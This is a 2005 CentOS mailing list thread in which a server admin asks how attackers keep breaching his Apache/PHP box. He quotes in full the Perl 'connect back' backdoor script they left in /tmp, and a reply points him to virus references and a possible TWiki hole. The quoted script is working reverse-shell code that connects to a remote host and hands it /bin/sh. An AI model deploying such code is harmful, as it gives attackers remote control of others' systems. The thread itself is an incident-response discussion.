Apache/PHP Security Help.

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]



A bit of simple Googling should point you in the right direction...

http://vil.nai.com/vil/content/v_129568.htm

http://www.google.co.uk/search?hl=en&q=Data+Cha0s+Connect+Back+Backdoor&btnG=Google+Search&meta=

Are you running Twiki open to the internet?

http://siomail.ucsd.edu/pipermail/rvtec-sysadmin/2004-December/000025.html

Will.

On 30/11/05, Ajay Sharma <ssharma@xxxxxxxxxxxxxxxx> wrote:
>
> I have a personal apache/mail server that is getting hacked and I'm not
> sure how the person is getting in.  What's happening is that every few
> days, the below script will show up in /tmp as 'dc.txt', owned by apache
> and then a TON of mail is queued up to a bunch of addresses in
> @uol.com.br.
>
> I initially thought they got in becuase I had an outdated version of
> 'gallery' installed.  I rebuild the server and update gallery and
> thought I should be okay.  But now they are still getting in and instead
> of blindly rebuilding the server, I need to figure out how they are able
> to run perl scripts on the server.
>
> Any suggestions?
>
> --Ajay
>
> PS.  This is a CentOS 4.2 box running the latest apache/php RPMS.
>
> ---------------------------
> #!/usr/bin/perl
> use Socket;
> print "Data Cha0s Connect Back Backdoor\n\n";
> if (!$ARGV[0]) {
>   printf "Usage: $0 [Host] <Port>\n";
>   exit(1);
> }
> print "[*] Dumping Arguments\n";
> $host = $ARGV[0];
> $port = 80;
> if ($ARGV[1]) {
>   $port = $ARGV[1];
> }
> print "[*] Connecting...\n";
> $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
> my $target = inet_aton($host);
> if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
>   die("Unable to Connect\n");
> }
> print "[*] Spawning Shell\n";
> if (!fork( )) {
>   open(STDIN,">&SERVER");
>   open(STDOUT,">&SERVER");
>   open(STDERR,">&SERVER");
>   exec {'/bin/sh'} '-bash' . "\0" x 4;
>   exit(0);
> }
> print "[*] Datached\n\n";
> --------------------------------
> _______________________________________________
> CentOS mailing list
> CentOS@xxxxxxxxxx
> http://lists.centos.org/mailman/listinfo/centos
>

[Index of Archives]     [CentOS]     [CentOS Announce]     [CentOS Development]     [CentOS ARM Devel]     [CentOS Docs]     [CentOS Virtualization]     [Carrier Grade Linux]     [Linux Media]     [Asterisk]     [DCCP]     [Netdev]     [Xorg]     [Linux USB]
  Powered by Linux